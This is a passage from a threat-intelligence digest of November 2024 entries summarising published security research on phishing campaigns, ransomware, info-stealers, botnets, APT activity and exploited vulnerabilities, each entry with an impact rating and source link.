Date of Scan:: 2024-11-20

Impact:: LOW

Summary:: CERT-AGID researcher have uncovered a phishing campaign targeting users of WeTransfer, a popular file-sharing service, and cPanel, a web hosting control panel. The attackers send fake emails with links claiming to share files but these links redirect victims to a website that closely mimics the cPanel Webmail login page. This fake page is hosted on GitHub to make the scam appear more legitimate. When victims enter their credentials on this fake page, the information such as login details email provider's server details (MX records) and the geolocation based on their IP address is secretly sent to a Telegram bot controlled by the attackers.

Source: https://cert-agid.gov.it/news/phishing-ospitato-su-github-ruba-credenziali-utilizzando-telegram/

Intel Source:: Clear Skys

Intel Name:: Zero_Day_Vulnerability_in_Windows

Date of Scan:: 2024-11-20

Impact:: MEDIUM

Summary:: A new zero-day vulnerability (CVE-2024-43451) has been discovered in several Windows systems, affecting the activation of malicious URL files. The vulnerability can be triggered through a variety of actions, including right-clicking the file, deleting it in Windows 10/11, or dragging it to another folder on Windows 10/11 and some versions of Windows 7/8/8.1. These files were found to be downloaded from an official Ukrainian government website, where users typically access academic certificates. The vulnerability is being exploited by the threat actor UAC-0194, suspected to be Russian, as part of a campaign targeting Ukrainian entities. The issue has been reported to CERT-UA and Microsoft, who released a security patch on November 12, 2024, to address the flaw.

Source: https://www.clearskysec.com/wp-content/uploads/2024/11/Zero-day-cve-2024-4351-report.pdf

Intel Source:: Palo Alto

Intel Name:: ApateWeb_Campaign_Updates

Date of Scan:: 2024-11-20

Impact:: LOW

Summary:: Palo Alo discovered new indicators on entry point infrastructure for the ApateWeb campaign, first reported in their January 2024 article.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-11-19-IOC-updates-for-ApateWeb-campaign.txt

Intel Source:: Cyfirma

Intel Name:: New_Variant_of_MIMIC_Ransomware

Date of Scan:: 2024-11-20

Impact:: MEDIUM

Summary:: Researchers at Cyfirma have uncovered a sophisticated dropper binary that deploys the ELPACO-team ransomware, a new variant of the MIMIC ransomware. Upon execution, it uses various malicious tools and legitimate utilities to disable system defenses, encrypt numerous file types, and ensure persistence. The ransomware targets critical files on both local and network drives, leaving a ransom note for the victim. It specifically encrypts certain file extensions while excluding others to avoid damaging vital system files, posing a significant threat to individuals and enterprises by evading detection and complicating recovery.

Source: https://www.cyfirma.com/research/elpaco-team-ransomware-a-new-variant-of-the-mimic-ransomware-family/

Intel Source:: SentinelOne

Intel Name:: macOS_Atomic_Stealers

Date of Scan:: 2024-11-19

Impact:: MEDIUM

Summary:: The "Atomic Stealer" family of malware, originally launched in 2023 as a project tied to ChatGPT, has rapidly evolved into a significant threat targeting macOS users, particularly in 2024. Known for its ability to spoof enterprise apps and evade security measures, this malware has grown into a Malware-as-a-Service (MaaS) offering, with variants like Amos, Banshee, Poseidon, and Cthulu spreading through businesses. These stealers often use sophisticated evasion techniques, such as obfuscating code, using encoded strings, and exploiting AppleScript to bypass security controls. Different variants are written in languages like Go, Objective-C, and C++, each exhibiting unique characteristics but sharing the goal of stealing sensitive data, including cryptocurrency wallets and user credentials.

Source: https://www.sentinelone.com/blog/from-amos-to-poseidon-a-soc-teams-guide-to-detecting-macos-atomic-stealers-2024

Intel Source:: Black Lotus Labs

Intel Name:: Use_and_Abuse_of_NSOCKS_Botnet

Date of Scan:: 2024-11-19

Impact:: MEDIUM

Summary:: Black Lotus Labs, part of Lumen Technologies, has uncovered critical details about the “ngioweb” botnet, a major component of the notorious NSOCKS criminal proxy service. Operating globally across 180 countries, NSOCKS leverages over 35,000 bots daily, with the majority originating from the ngioweb botnet, which infects small office/home office routers and IoT devices. This botnet is heavily used for malicious activities, including distributed denial of service (DDoS) attacks, credential stuffing, and phishing. The infrastructure behind NSOCKS includes over 180 backconnect command-and-control (C2) nodes that route traffic to disguise users' identities. These proxies are often exploited by cybercriminals to amplify attacks and avoid detection, with substantial overlap between NSOCKS and other illicit proxy services like Shopsocks5.

Source: https://blog.lumen.com/one-sock-fits-all-the-use-and-abuse-of-the-nsocks-botnet/

Intel Source:: PT Security

Intel Name:: Space_Pirates_Hacker_Group

Date of Scan:: 2024-11-19

Impact:: MEDIUM

Summary:: The "Space Pirates" hacker group, first identified by Positive Technologies in 2019, has been targeting Russian aerospace and government organizations, as well as other state-owned enterprises in Russia, Georgia, and Mongolia, with espionage and data theft operations. Their malware toolkit includes unique backdoors like MyKLoadClient, BH_A006, and Deed RAT, as well as commonly used malware such as PlugX and ShadowPad. The group, believed to have Asian origins due to language usage and toolsets linked to Chinese hacker groups, has connections with other APT groups, notably TA428, suggesting collaboration and shared resources. Notably, Space Pirates uses a variety of techniques, including phishing and DLL side-loading, to install malware and maintain persistent access to compromised networks.

Source: https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections

Intel Source:: Trend Micro

Intel Name:: Earth_Kasha_New_LODEINFO_Campaign

Date of Scan:: 2024-11-19

Impact:: MEDIUM

Summary:: LODEINFO is a malware used in attacks primarily targeting Japan since 2019, tracked by Trend Micro under the name Earth Kasha. While some vendors link the group to APT10, there is insufficient evidence to confirm this connection, leading to the use of the term APT10 Umbrella to describe related intrusion sets. Earth Kasha has historically targeted public institutions and academics through spear-phishing. However, from early 2023 to 2024, the group has significantly updated its tactics, techniques, and tools in a new campaign.

Source: https://www.trendmicro.com/en_us/research/24/k/lodeinfo-campaign-of-earth-kasha.html

Intel Source:: Pepe Berba

Intel Name:: Malicious_Browser_Extension_Samples

Date of Scan:: 2024-11-19

Impact:: LOW

Summary:: Pepe Berba details how to acquire and analyze malicious browser extension samples on a limited budget, using free resources and basic cryptanalysis techniques. Starting with a sample referenced in a blog post about malware bypassing Google Chrome's Manifest V3, he demonstrates how to track down similar malicious extensions through creative searching of hashes and features, such as unique directory structures. By leveraging free tools like VirusTotal, MalwareBazaar, and URLscan, and employing cryptographic analysis to decode obfuscated payloads, Berba was able to obtain and decrypt malicious extensions. He further explores the process of tracking new samples, analyzing their evolution over time, and decrypting C2 domain information embedded in blockchain transactions.

Source: https://pberba.github.io/crypto/2024/09/14/malicious-browser-extension-genesis-market/

Intel Source:: ISC.SANS

Intel Name:: Detecting_Debugger_Presence_on_Linux_Systems

Date of Scan:: 2024-11-19

Impact:: LOW

Summary:: ISC.SANS researchers have discussed methods for detecting the presence of a debugger on a Linux system. It highlights various techniques that malware and security researchers use to identify if a debugger is attached to a process, which can help in evading analysis or reverse engineering. They outline specific tools and system checks, such as examining `/proc/[pid]/status` for signs of debugging or using ptrace system calls to monitor process behavior. It also covers potential countermeasures, including the manipulation of system calls and environment variables to hide or mask debugging activity.

Source: https://isc.sans.edu/diary/Detecting+the+Presence+of+a+Debugger+in+Linux/31450/

Intel Source:: CERT-AGID

Intel Name:: Vidar_Malware_Targets_Italian_PEC_Accounts_Again

Date of Scan:: 2024-11-19

Impact:: LOW

Summary:: The Vidar malware has resurfaced, targeting Italian email accounts once again, using compromised PEC accounts as a source for its attacks. This new campaign introduces a shift in tactics, utilizing VBS files to execute PS1 scripts. Notably, over 100 domains and nearly 1,000 subdomains were created to host the VBS files, with URLs initially inactive and only activated on November 18, suggesting strategic timing. The attackers appear to favor launching these campaigns on Sundays to target recipients at the start of the work week. Vidar remains a significant threat, capable of stealing sensitive information, and the use of compromised PEC accounts makes it particularly deceptive and dangerous.

Source: https://cert-agid.gov.it/news/il-malware-vidar-evolve-con-nuove-strategie-di-diversificazione-dei-domini/

Intel Source:: Sekoia

Intel Name:: Helldown_Ransomware_Targets_Linux

Date of Scan:: 2024-11-19

Impact:: LOW

Summary:: Researchers from Sekoia have discovered a Linux form of the Helldown ransomware, which was previously only known to target Windows PCs. Cyfirma first reported the Helldown organization in August 2024, and they use double extortion techniques, exfiltrating critical data and threatening to disclose it unless ransoms are paid. With 31 victims, including Zyxel's European subsidiary, claimed within three months, the group has been very active.

Source: https://blog.sekoia.io/helldown-ransomware-an-overview-of-this-emerging-threat/

Intel Source:: Palo Alto

Intel Name:: FrostyGoop_Closer_Look

Date of Scan:: 2024-11-19

Impact:: MEDIUM

Summary:: Unit 42 detailed the FrostyGoop malware, also known as BUSTLEBERM, which emerged as a significant threat to operational technology (OT) infrastructure in 2024. Its notable attack disrupted heating for over 600 buildings in Ukraine during sub-zero temperatures by exploiting vulnerabilities in ICS/OT devices using the Modbus TCP protocol. This marks it as the ninth known OT-centric malware and the first to disrupt critical infrastructure on this scale. FrostyGoop's capabilities include reading and modifying data on industrial control devices, often using JSON configuration files for targeted attacks. Analysis revealed the malware's use of open-source libraries, debugger evasion techniques, and associated tools like go-encrypt.exe, suspected for concealing configuration data.

Source: https://unit42.paloaltonetworks.com/frostygoop-malware-analysis/

Intel Source:: LevelBlue

Intel Name:: Ngioweb_Proxy_Server_Botnet

Date of Scan:: 2024-11-19

Impact:: LOW

Summary:: The Ngioweb proxy server botnet, active for over seven years, continues to grow and evolve with minimal changes to its core code. Initially observed in 2017 and linked to the Ramnit malware family, Ngioweb's primary function is to infect vulnerable residential devices—such as routers, cameras, and IoT devices—by exploiting various vulnerabilities, including newly discovered zero-days. Once infected, these devices are sold on the black market as residential proxies via platforms like Nsocks, offering cheap access to nearly 30,000 global IPs. The botnet's impact is substantial, with over 75% of infected devices being residential ISP users, and growing demand for proxies used in malicious activities, such as cyberattacks and evading detection.

Source: https://levelblue.com/blogs/labs-research/ngioweb-remains-active-7-years-later

Intel Source:: ZScaler

Intel Name:: Raspberry_Robin_Analysis

Date of Scan:: 2024-11-19

Impact:: MEDIUM

Summary:: Zscaler researchers deep dives into Raspberry Robin, which is a sophisticated malware with a multi-layered architecture designed to evade detection and analysis. Its execution involves eight distinct layers, each employing unique obfuscation and anti-analysis techniques. Early layers use methods like XOR decryption, modified compression algorithms, and CPU performance checks to bypass sandboxes or analysis environments. Notably, the malware uses advanced anti-analysis tactics, such as detecting emulated environments through CPU write-combining or examining system hardware configurations. If evasion fails, it deploys a decoy payload designed to assess the analysis environment. Later stages leverage control flow flattening, encrypted function keys, and Mixed Boolean-Arithmetic operations, further complicating analysis.

Source: https://www.zscaler.com/blogs/security-research/unraveling-raspberry-robin-s-layers-analyzing-obfuscation-techniques-and

Intel Source:: TRAC Labs

Intel Name:: Gabagool_Phishing_Kit

Date of Scan:: 2024-11-18

Impact:: MEDIUM

Summary:: The "Gabagool" phishing campaign, identified by TRAC Labs, is targeting corporate and government employees using a sophisticated method involving Cloudflare R2 buckets. These buckets, which are typically used for hosting large volumes of unstructured data, are being exploited by attackers to host malicious phishing landing pages, leveraging Cloudflare's trusted reputation to bypass security filters. The attack begins with email account compromise, followed by phishing emails containing links to fake documents hosted on platforms like SharePoint or Box. Victims who click on these links are redirected to malicious Cloudflare R2-hosted pages designed to harvest login credentials. The phishing kit uses obfuscated JavaScript to detect and avoid bots, while carefully crafted POST requests collect sensitive information like email addresses and passwords, even accounting for multifactor authentication methods.

Source: https://medium.com/@traclabs_/aitm-phishing-hold-the-gabagool-analyzing-the-gabagool-phishing-kit-531f5bbaf0e4

Intel Source:: Trend Micro

Intel Name:: IoT_Devices_Targeted_by_Water_Barghest

Date of Scan:: 2024-11-18

Impact:: LOW

Summary:: Researchers from Trend Micro have revealed that the Water Barghest botnet, which comprises over 20,000 IoT devices by October 2024, monetizes hacked devices by exploiting vulnerabilities and selling them on residential proxy marketplaces. The botnet employs automated scripts to target IoT devices discovered through public internet scan databases such as Shodan.

Source: https://www.trendmicro.com/en_us/research/24/k/water-barghest.html

Intel Source:: Proofpoint

Intel Name:: ClickFix_Social_Engineering_Technique

Date of Scan:: 2024-11-18

Impact:: LOW

Summary:: Proofpoint researchers have identified a rise in a social engineering technique called ClickFix, used by threat actors to impersonate legitimate software like Microsoft Word, Google Chrome, and specialized software in industries like transportation and logistics. This technique typically involves luring users to a malicious URL or file, where they are shown a dialog box suggesting a document or webpage error. The box provides instructions to fix the issue, either automatically or manually, by executing a malicious script via PowerShell or the Windows Run dialog. ClickFix campaigns have been linked to malware such as AsyncRAT, Danabot, DarkGate, and Lumma Stealer.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape

Intel Source:: Intezer

Intel Name:: BabbleLoader

Date of Scan:: 2024-11-18

Impact:: LOW

Summary:: BabbleLoader is an advanced and evasive malware loader designed to bypass traditional antivirus and sandbox defenses. It uses a range of sophisticated evasion techniques, including junk code insertion, metamorphic transformations, and dynamic API resolution, to avoid detection by signature-based, AI-based, and behavioral security systems. The loader also employs shellcode loading and decryption to conceal its payload in memory, bypassing file-based scanning. Anti-sandboxing and anti-analysis features further obstruct virtual environment detection. BabbleLoader has been observed in various campaigns targeting both general users seeking cracked software and business professionals, particularly those in finance and administration, disguised as legitimate software like accounting tools or HR forms.

Source: https://intezer.com/blog/research/babble-babble-babble-babble-babble-babble-babbleloader/

Intel Source:: MalwarHunterTeam

Intel Name:: SVG_Attachment_Used_in_Phishing_Emails

Date of Scan:: 2024-11-18

Impact:: LOW

Summary:: Threat actors increasingly use Scalable Vector Graphics (SVG) attachments to carry out phishing attacks or deploy malware while bypassing traditional detection methods. Unlike common image formats like JPG or PNG, which use pixels to form images, SVGs are vector-based, relying on lines, shapes, and mathematical formulas to describe images. This allows SVGs to scale without losing quality, making them ideal for browser-based applications and harder to detect for malicious use.

Source: https://x.com/malwrhunterteam/status/1857407160528842891 https://x.com/malwrhunterteam/status/1857518555442430184

Intel Source:: MalwareBytes

Intel Name:: QuickBooks_Popup_Scam_via_Google

Date of Scan:: 2024-11-18

Impact:: LOW

Summary:: A persistent scam targeting QuickBooks users, primarily promoted through Google ads, continues to plague victims. Scammers, often based in India, are using two primary tactics: one involves a fraudulent website offering QuickBooks support with a fake phone number, and the other lures users to download a malicious program that generates deceptive popup alerts within QuickBooks. These popups falsely warn users about data corruption, prompting them to call the scammers for help. Victims are often tricked into downloading a program hosted on Dropbox that installs both the legitimate QuickBooks software and a hidden backdoor file, which controls the popup messages. This ongoing scam not only demands payments to fix non-existent issues but also poses further risks, including remote access to victims' computers and the installation of additional malware to steal sensitive data.

Source: https://www.malwarebytes.com/blog/scams/2024/11/quickbooks-popup-scam-still-being-delivered-via-google-ads

Intel Source:: X (Twitter)

Intel Name:: Fake_AI_Generators_Spread_Lumma_and_AMOS_Malware

Date of Scan:: 2024-11-18

Impact:: LOW

Summary:: Fake AI image and video generators are infecting Windows and macOS devices with Lumma Stealer and AMOS malware, respectively. These information-stealing threats target cryptocurrency wallets, credentials, passwords, cookies, and browsing history from major browsers like Chrome, Edge, and Firefox. The stolen data is compiled into an archive and sent to attackers for further exploitation or sale on cybercrime marketplaces.

Source: https://x.com/g0njxa/status/1857485682299519034

Intel Source:: Palo Alto

Intel Name:: Operation_Lunar_Peek

Date of Scan:: 2024-11-18

Impact:: MEDIUM

Summary:: Palo Alto Networks and Unit 42 are tracking exploitation activity related to a critical vulnerability, CVE-2024-0012, in PAN-OS software, which allows unauthenticated attackers with network access to the management interface to gain administrator privileges and perform malicious actions. While patches for the vulnerability are available, the risk is significantly reduced if access to the management interface is restricted to trusted internal IPs, as per Palo Alto’s best practice guidelines. The observed exploitation, dubbed Operation Lunar Peek, has involved attackers executing commands and deploying malware, such as webshells.

Source: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/

Intel Source:: ISC.SANS

Intel Name:: Unpatched_Citrix_Vulnerability_Exploited

Date of Scan:: 2024-11-18

Impact:: LOW

Summary:: Researchers at SANS ISC have discovered a critical, unpatched vulnerability in Citrix's "Virtual Apps and Desktops" remote access solution, which is frequently used for secure remote work configurations. This weakness allows attackers, especially ransomware operators, to gain elevated access, possibly compromising the server and all linked sessions.

Source: https://isc.sans.edu/diary/Exploit+attempts+for+unpatched+Citrix+vulnerability/31446/

Intel Source:: Palo Alto

Intel Name:: Raspberry_Robin_Infection_Chain_Uses_WebDAV_Server

Date of Scan:: 2024-11-15

Impact:: LOW

Summary:: A new infection chain for Raspberry Robin, traced back to late October 2024, appears to be distributed through third-party ads on various websites. The campaign involves zip archives (e.g., access.zip, bootstrap.zip) that contain HTA files (e.g., access.hta, bootstrap.hta), each designed to run an obfuscated script hosted on publicly-accessible URLs. These scripts retrieve and execute a Raspberry Robin DLL hosted on a WebDAV server. The WebDAV servers rotate DLL files every 50 minutes, each with a unique size and hash. Testing reveals that the DLLs generate Tor-based command-and-control traffic, a known characteristic of Raspberry Robin.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-11-14-IOCs-for-Raspberry-Robin-activity.txt

Intel Source:: Volexity

Intel Name:: BrazenBamboo_Threat_Actor

Date of Scan:: 2024-11-15

Impact:: MEDIUM

Summary:: Volexity has uncovered a critical zero-day vulnerability in Fortinet's FortiClient VPN software, which BrazenBamboo, a Chinese state-affiliated cyber espionage group, has exploited through their DEEPDATA malware to steal VPN credentials. The vulnerability allows credentials to be extracted from FortiClient’s process memory after user authentication. DEEPDATA, a modular post-exploitation tool, supports a variety of plugins to collect sensitive data, including passwords, chat logs, and WiFi credentials. Volexity also discovered a new Windows variant of the LIGHTSPY malware family, known for targeting multiple platforms including mobile and desktop systems. BrazenBamboo’s operations, which include sophisticated C2 infrastructure, evidence of continued development, and a focus on domestic surveillance, suggest the group provides custom malware capabilities for government clients.

Source: https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/

Intel Source:: EclecticIQ

Intel Name:: SilkSpecter_Group_Targeting_Black_Friday_Shoppers

Date of Scan:: 2024-11-15

Impact:: LOW

Summary:: EclecticIQ researchers have uncovered a phishing campaign targeting e-commerce shoppers in Europe and the USA during the Black Friday shopping season. The campaign, attributed with high confidence to the Chinese financially motivated threat actor SilkSpecter, uses fake discounted products to trick victims into providing sensitive data such as Cardholder Data (CHD), Sensitive Authentication Data (SAD), and Personally Identifiable Information (PII). SilkSpecter exploits the legitimate payment processor Stripe to facilitate covert data exfiltration. The attackers enhance the phishing site's credibility by using Google Translate to adapt the site’s language based on the victim's location. Previous campaigns linked to a Chinese SaaS platform, oemapps, suggest it helps SilkSpecter quickly create convincing phishing sites. The domains involved often use .top, .shop, .store, and .vip TLDs and engage in typosquatting of legitimate e-commerce brands.

Source: https://blog.eclecticiq.com/inside-intelligence-center-financially-motivated-chinese-threat-actor-silkspecter-targeting-black-friday-shoppers

Intel Source:: Esentire

Intel Name:: BeaverTail_and_InvisibleFerret_Malware

Date of Scan:: 2024-11-15

Impact:: MEDIUM

Summary:: Researchers at ESentire have identified an attack where JavaScript project was compromised with BeaverTail malware which was downloaded by software developer. When the developer installed the project, it triggers the execution of malicious files that downloaded and run another malware called InvisibleFerret. InvisibleFerret malware saves on the victim's computer as a hidden file named "sysinfo" and is executes using Python. These malwares steal saved login credentials, collecting system information, and targeting cryptocurrency wallets like Exodus and Solana to extract sensitive data.

Source: https://www.esentire.com/blog/bored-beavertail-invisibleferret-yacht-club-a-lazarus-lure-pt-2

Intel Source:: Palo Alto

Intel Name:: North_Korean_IT_Cluster_Phishing_Campaign

Date of Scan:: 2024-11-15

Impact:: LOW

Summary:: Researchers from Palo Alto have observed that North Korean IT cluster CL-STA-0237 is active in scams using malware-infected video apps and most likely operating from Laos. In 2022, this gang hacked a US SMB to gain a tech role, thereby assisting North Korea's illegal projects. Organizations could strengthen hiring practices, detect insider threats, and enforce corporate device policies.

Source: https://unit42.paloaltonetworks.com/fake-north-korean-it-worker-activity-cluster/

Intel Source:: Cyble

Intel Name:: DONOT_APT_Targets_Maritime_and_Defense_Manufacture

Date of Scan:: 2024-11-15

Impact:: LOW

Summary:: Cyble researchers have uncovered a campaign operated by DoNot APT group also known as APT-C-35 targeting Pakistan manufacturing sector which includes maritime and defense sectors. This group has been active since 2016 and known for targeting government, military, and diplomatic organizations across South Asia. In this campaign, attackers use malicious .LNK file disguised as an RTF document that delivered via spam emails in RAR archives. When victim clicks on the files, it executes malicious commands through cmd.exe and PowerShell. It connects to a C2 server, sending a unique device ID via POST and receiving commands for actions such as self-destruction, downloading encrypted payloads, or performing additional malicious tasks.

Source: https://cyble.com/blog/donots-attack-on-maritime-defense-manufacturing/

Intel Source:: ASEC

Intel Name:: XLoader_Malware

Date of Scan:: 2024-11-15

Impact:: LOW

Summary:: ASEC researchers have identified a malware called XLoader which is being distributed through a technique called DLL-side loading. This technique placing a legitimate application and a malicious DLL in the same folder so that the malicious file runs when the application starts. The malware is delivered in a compressed file containing the legitimate application along with two malicious DLL files named jli.dll and concrt140e.dll. When the legitimate application runs, it unknowingly triggers the malicious DLLs.

Source: https://asec.ahnlab.com/ko/84431/

Intel Source:: Gen Digital

Intel Name:: Glove_Stealer_NET_Malware

Date of Scan:: 2024-11-15

Impact:: MEDIUM

Summary:: Glove Stealer is a sophisticated information-stealing malware observed in phishing campaigns, primarily spread through deceptive emails resembling troubleshooting tools like "ClickFix." Once executed, Glove Stealer targets sensitive data from a wide range of browsers, including Chrome, Firefox, and Edge, as well as over 280 browser extensions and 80 locally installed applications, including cryptocurrency wallets, password managers, 2FA authenticators, and email clients. The malware uses advanced techniques, such as bypassing App-Bound encryption introduced by Google in Chrome 127, by leveraging a supporting module that utilizes the IElevator service. After infecting the victim's system, it exfiltrates data, including cookies, autofill, wallets, and device information, encrypts it using 3DES, and sends it to a remote command-and-control server.

Source: https://www.gendigital.com/blog/news/innovation/glove-stealer

Intel Source:: SentinelOne

Intel Name:: Cloud_Ransom_Attacks

Date of Scan:: 2024-11-14

Impact:: MEDIUM

Summary:: SentinelOne researchers have observed that attackers are increasingly targeting cloud storage services like Amazon S3 and Azure Blob Storage where they copy files to their own system before deleting or encrypting the originals to demand ransom. These attacks often exploit storage misconfigurations that grant write access to cloud storage. Apart from targeting cloud storage, some ransomware groups like BianLian and Rhysida are now using cloud services to exfiltrate data from victims rather than relying on tools like MEGAsync. Furthermore, attackers use Amazon S3 for data exfiltration along with a Python script RansomES that exfiltrates files to S3 or FTP before encrypting them locally. Cloud-hosted web applications such as PHP are also being targeted by attackers for encrypting files on web servers and other systems.

Source: https://www.sentinelone.com/blog/the-state-of-cloud-ransomware-in-2024/

Intel Source:: Checkpoint

Intel Name:: A_Deep_Dive_Analysis_of_WezRat

Date of Scan:: 2024-11-14

Impact:: MEDIUM

Summary:: Checkpoint researchers have investigated a malware called WezRat that linked to the Iranian cyber group Emennet Pasargad. This group is affiliated to Iran’s Islamic Revolutionary Guard Corps (IRGC) and has been involved in various cyber operations across the US, France, Sweden, and Israel. The malware spread through phishing emails targeting Israeli organisations. These emails impersonate the Israeli National Cyber Directorate (INCD) which encourage recipients to click a link for an urgent Google Chrome update. This link redirected victims to a deceptive website where they unknowingly downloaded a file as the Chrome installer. This file contains the legitimate browser update but also dropped a hidden backdoor named Updater.exe. which is capable for taking screenshots, keylogging, and stealing files, clipboard data, and browser cookies.

Source: https://research.checkpoint.com/2024/wezrat-malware-deep-dive/

Intel Source:: 360 Threat Intelligence Center

Intel Name:: Kimsuky_Group_Analysis

Date of Scan:: 2024-11-14

Impact:: MEDIUM

Summary:: Researchers at the 360 Advanced Threat Research Institute uncovered a campaign by APT-C-55 (Kimsuky), a North Korean cyber threat group known for targeting South Korean institutions and expanding operations to the U.S., Europe, and other regions to steal intelligence. The group has employed GitHub as a platform for distributing malicious payloads, demonstrating their evolving tactics. Initial attacks began with deceptive LNK files that masked malicious scripts similar to past Kimsuky macros. The payloads accessed through GitHub were designed to collect system information, upload data to a remote server, and execute persistent malware using PowerShell commands. The attackers used social engineering techniques to disguise paths associated with reputable antivirus products to enhance stealth. Additionally, analysis of their infrastructure revealed FTP servers containing data from compromised systems.

Source: https://mp.weixin.qq.com/s/GzMoR8jKjelzuj5BPhpJYA

Intel Source:: MalwareBytes

Intel Name:: Advertisers_Pushing_Popup_Blockers

Date of Scan:: 2024-11-14

Impact:: LOW

Summary:: In a recent investigation, MalwareBytes discovered that advertisers are employing deceptive tactics to push ad and pop-up blockers, leveraging old social engineering tricks. On media sites, misleading ads entice visitors with content that requires additional browser extensions to access. Historically, such scams would request video codecs, but now users are prompted to install extensions like "Adblock Pro" to enable safe mode viewing. This extension directs users to another, "Push Notifications Blocker," which demands extensive permissions and exhibits problematic behavior, including browser slowdowns, unexpected redirects, and altered search results. Classifying this as adware, researchers noted that the same trick was used to promote other popular ad blockers, suggesting an affiliate marketing scheme where commissions are earned from users' installations.

Source: https://www.malwarebytes.com/blog/news/2024/11/advertisers-are-pushing-ad-and-pop-up-blockers-using-old-tricks

Intel Source:: S2W Talon

Intel Name:: TheftCalls_Detailed_Analysis

Date of Scan:: 2024-11-14

Impact:: LOW

Summary:: S2W's TALON team details the activities of "TheftCRow," a voice phishing organization targeting South Korean users through malware. The group distributes apps disguised as legitimate services like financial institutions, luring victims via phishing sites and smishing campaigns. Their malware, TheftCalls Loader, forcibly installs a secondary app, TheftCalls, which can access device functions, record calls, and broadcast live microphone and camera feeds. This malware bypasses permissions and security measures, deletes security apps, and interacts with C2 servers to execute harmful commands.

Source: https://medium.com/s2wblog/detailed-analysis-of-theftcalls-impersonating-frequently-used-korean-apps-c3ebbfd7f746

Intel Source:: ASEC

Intel Name:: DDoSia_Attacks_on_Korean_Institutions

Date of Scan:: 2024-11-14

Impact:: LOW

Summary:: Researchers from ASEC have discovered that the Russian hacktivist group NoName057(16), along with pro-Russian supporters, initiated DDoS attacks on South Korean institutions in November 2024, targeting officials who supported Ukraine. Using DDoSia software, they organized volunteers via Telegram, compensating them with cryptocurrency and regularly changing C&C server addresses to avoid detection.

Source: https://asec.ahnlab.com/ko/84426/

Intel Source:: Cisco Talos

Intel Name:: New_PXA_Stealer_targets_Europe_and_Asia

Date of Scan:: 2024-11-14

Impact:: LOW

Summary:: Cisco Talos researchers have uncovered a new information-stealing campaign operated by a Vietnamese-speaking threat actor targeting the education sector in India and government organizations in European countries, including Sweden and Denmark. The attacker leverages python-based malware called PXA Stealer to exfiltrate sensitive information from victims which includes credentials for various online accounts, VPN and FTP clients, financial information, browser cookies, and data from gaming software. This stealer is capable to decrypt the master passwords stored in victims' browsers to access and steal their stored credentials. The attacker also operates the telegram channel “Mua Bán Scan MINI” where they sell Facebook accounts, Zalo accounts, SIM cards, credentials, and money laundry data.

Source: https://blog.talosintelligence.com/new-pxa-stealer/

Intel Source:: Security Intelligence

Intel Name:: Strela_Stealer_Updates

Date of Scan:: 2024-11-13

Impact:: LOW

Summary:: Researchers from IBM X-Force have uncovered a cybercriminal group called Hive0145 which is targeting victims across Europe mainly in Spain, Germany, and Ukraine, with Strela Stealer malware. This malware is distributed through phishing emails disguised as real invoice notifications which were stolen through previously exfiltrated email credentials. The stealer is designed to steal login credentials saved in Microsoft Outlook and Mozilla Thunderbird. Hive0145 is financially motivated initial access broker (IAB) and potentially the sole operator of Strela Stealer and has been active since 2022. Their continuous activity raises the risk of attacks for individuals and organizations across Europe.

Source: https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/

Intel Source:: Blackberry

Intel Name:: LightSpy_Malware_Campaign

Date of Scan:: 2024-11-13

Impact:: MEDIUM

Summary:: BlackBerry researcher have identified an advance malware campaign called Lightspy, likely operated by Chinese cyber-espionage group APT41. The malware first discovered in 2020 and primarily focuses on targets in the Asia-Pacific region. APT41 has now introduced a new malware framework for windows called DeepData which enables the group to collect sensitive data across platforms. This framework allows APT41 to monitor communications on major messaging platforms like WhatsApp, Telegram, Signal, and WeChat as well as track emails (Outlook) and corporate communication tools such as DingDing and Feishu. Additionally, it can steal browser credentials, application passwords, and data from password managers like KeePass. DeepData also collects detailed system intelligence including network configurations, installed software, and record audio.

Source: https://blogs.blackberry.com/en/2024/11/lightspy-apt41-deploys-advanced-deepdata-framework-in-targeted-southern-asia-espionage-campaign

Intel Source:: Any.Run

Intel Name:: HawkEye_Malware

Date of Scan:: 2024-11-13

Impact:: LOW

Summary:: Researcher at Any.run have discovered a malware called Hawkeye also known as PredatorPain. The malware began as a basic keylogger but now it has become a stealer malware which is capable of gathering sensitive information. This malware is mainly distributed through spear-phishing emails that trick victims into downloading infected files, often disguised as documents, compressed files, or other types of loaders. Once it gets downloaded can steal login credentials from email accounts, browsers info, and FTP credential, and capture screenshots. It also gathers system and network information and often hiding itself in temporary folders or Windows directories to avoid detection. Sometimes . In some campaigns, HawkEye has been combined with other malware loaders, such as Remcos and Pony.

Source: https://any.run/cybersecurity-blog/hawkeye-malware-technical-analysis/?utm_source=twitter&utm_medium=post&utm_campaign=hawkeye_analysis&utm_content=linktoblog&utm_term=131124

Intel Source:: Hunt.IO

Intel Name:: Sliver_C2_and_Ligolo_ng

Date of Scan:: 2024-11-13

Impact:: LOW

Summary:: Silver is a C2 framework developed by Bishop Fox for red teaming however, it has become popular among cybercriminals and state-sponsored attackers as a hidden alternative like Cobalt Strike. Sliver works on Windows, macOS, and Linux and uses secure communication channels like mTLS, WireGuard, and HTTPS to keep activities hidden. It allows attackers to inject malicious code and run .NET programs directly in memory. Similarly, Ligolo-ng is another tool that helps attackers move through networks by creating a secure reverse connection, enabling them to access and explore compromised internal systems.

Source: https://hunt.io/blog/sliver-c2-ligolo-ng-targeting-yc

Intel Source:: Xlabs

Intel Name:: Melofee_Backdoor_Variant_Targets_RHEL_7_9

Date of Scan:: 2024-11-13

Impact:: MEDIUM

Summary:: XLab's researchers have detected an ELF file named pskt from IP address 45[.]92[.]156[.]166, which was undetected on VirusTotal. The file triggered two alerts—an Overlay section and a communication domain mimicking Microsoft. Analysis revealed it as a new variant of the Melofee backdoor, targeting Red Hat Enterprise Linux (RHEL) 7.9. Originally exposed in March 2023 and linked to the APT group Winnti, this variant features upgrades including an RC4-encrypted kernel driver for masking traces, enhanced persistence, single-instance control, and changes in network connection class names. The modifications, observed through examination of sample Run-Time Type Information (RTTI), suggest the ongoing evolution of the Melofee backdoor to evade detection.

